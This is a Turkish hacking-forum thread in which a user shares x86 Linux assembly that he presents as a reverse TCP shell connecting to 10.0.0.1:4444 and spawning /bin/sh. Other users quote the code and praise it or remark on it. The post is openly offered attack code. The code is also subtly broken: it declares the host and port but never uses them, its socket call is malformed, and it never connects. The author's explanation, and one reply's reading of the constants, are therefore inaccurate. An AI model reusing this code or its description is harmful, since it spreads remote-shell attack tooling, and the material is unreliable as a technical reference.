Reverse Tcp kodu

Ç

Çokgen

Katılımcı Üye
4 Eyl 2023
412
194
Merhaba arkadaşlar

Bugün kodladığım basit bir assembly kodunu sizler ile paylaşıcağım.

Bu kod Linux işletim sistemi içindir.



Kod: 
section .data
  host db "10.0.0.1"
  port dw 4444

section .text
  global _start

_start:
  xor eax, eax
  xor ebx, ebx
  xor ecx, ecx
  xor edx, edx
  mov al, 2
  mov bl, 1
  int 0x80

  xor eax, eax
  xor ecx, ecx
  xor edx, edx
  mov al, 0x66
  mov bl, 3
  push edx
  push ecx
  push ebx
  mov ecx, esp
  int 0x80

  xor eax, eax
  xor ebx, ebx
  xor ecx, ecx
  xor edx, edx
  mov al, 11
  push edx
  push dword 0x68732f2f
  push dword 0x6e69622f
  mov ebx, esp
  push edx
  push ebx
  mov ecx, esp
  push edx
  push ecx
  mov edx, esp
  push ebx
  mov ecx, esp
  int 0x80

  xor eax, eax
  xor ebx, ebx
  mov al, 1
  int 0x80



Bu yazdığım kod 10.0.0.1 ip adresinin 4444 portuna ters Tcp bağlantısı kurar. Sonrasında hedefin komutlarını almak için kullanılabilir. Linux işletim sisteminde /bin/sh komutunu çalıştırır.
 
Son düzenleme:
Flack

Flack

Katılımcı Üye
5 Tem 2020
474
391
in Turkey
Çokgen' Alıntı:
Merhaba arkadaşlar

Bugün kodladığım basit bir assembly kodunu sizler ile paylaşıcağım.

[CODE]section .data host db "10.0.0.1" port dw 4444 section .text global _start _start: xor eax, eax xor ebx, ebx xor ecx, ecx xor edx, edx mov al, 2 mov bl, 1 int 0x80 xor eax, eax xor ecx, ecx xor edx, edx mov al, 0x66 mov bl, 3 push edx push ecx push ebx mov ecx, esp int 0x80 xor eax, eax xor ebx, ebx xor ecx, ecx xor edx, edx mov al, 11 push edx push dword 0x68732f2f push dword 0x6e69622f mov ebx, esp push edx push ebx mov ecx, esp push edx push ecx mov edx, esp push ebx mov ecx, esp int 0x80 xor eax, eax xor ebx, ebx mov al, 1 int 0x80[/CODE]

Bu yazdığım kod 10.0.0.1 ip adresinin 4444 portuna ters Tcp bağlantısı kurar. Sonrasında hedefin komutlarını almak için kullanılabilir.
Genişletmek için tıkla ...
Çok Karmaşık Görünüyor Açıkçası dilin ismi nasıl telaffuz ediliyor onu bilemiyorum :)
 
Flack

Flack

Katılımcı Üye
5 Tem 2020
474
391
in Turkey
Çokgen' Alıntı:
:D sanıldığı kadar zor olmadığını düşünüyorum aslında, öğrenmek isteyenin rahatça öğrenebiliceği kolay bir dil aslında.
Genişletmek için tıkla ...
Beynimin büyük bir kısmını ANSI C ve ISO C yedi bitirdi Bir de Assembly üstüne gibi sayko bir şeyle iyice kontağı attırtırsam kulaklardan duman atmaya başlarım ben sana da bu süreçte başarılar diliyorum eğer bu tarz sağlam emek isteyen programlardan hoşlanıyorsan skyfall adlı şarkıyı açıp F**ck brain isimli yazılıma da bakabilirsin :D
 
iskabo

iskabo

Anka Team Junior
28 Kas 2023
131
58
Çokgen' Alıntı:
Merhaba arkadaşlar

Bugün kodladığım basit bir assembly kodunu sizler ile paylaşıcağım.

section .data host db "10.0.0.1" port dw 4444 section .text global _start _start: xor eax, eax xor ebx, ebx xor ecx, ecx xor edx, edx mov al, 2 mov bl, 1 int 0x80 xor eax, eax xor ecx, ecx xor edx, edx mov al, 0x66 mov bl, 3 push edx push ecx push ebx mov ecx, esp int 0x80 xor eax, eax xor ebx, ebx xor ecx, ecx xor edx, edx mov al, 11 push edx push dword 0x68732f2f push dword 0x6e69622f mov ebx, esp push edx push ebx mov ecx, esp push edx push ecx mov edx, esp push ebx mov ecx, esp int 0x80 xor eax, eax xor ebx, ebx mov al, 1 int 0x80

Bu yazdığım kod 10.0.0.1 ip adresinin 4444 portuna ters Tcp bağlantısı kurar. Sonrasında hedefin komutlarını almak için kullanılabilir.
Genişletmek için tıkla ...
elinize sağlık
 
A

alexandre20

Katılımcı Üye
13 Tem 2022
906
710
sadece linux sistemlerde çalışır çünkü *execve*'ye syscall yapıyor, ve verdiği parametreler "0x6e69622f, 0x6e69622f" sadece linuxte bulunan /bin/sh'ye ait
 
Son düzenleme:
Cevap yazmak için giriş yap yada kayıt ol.
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.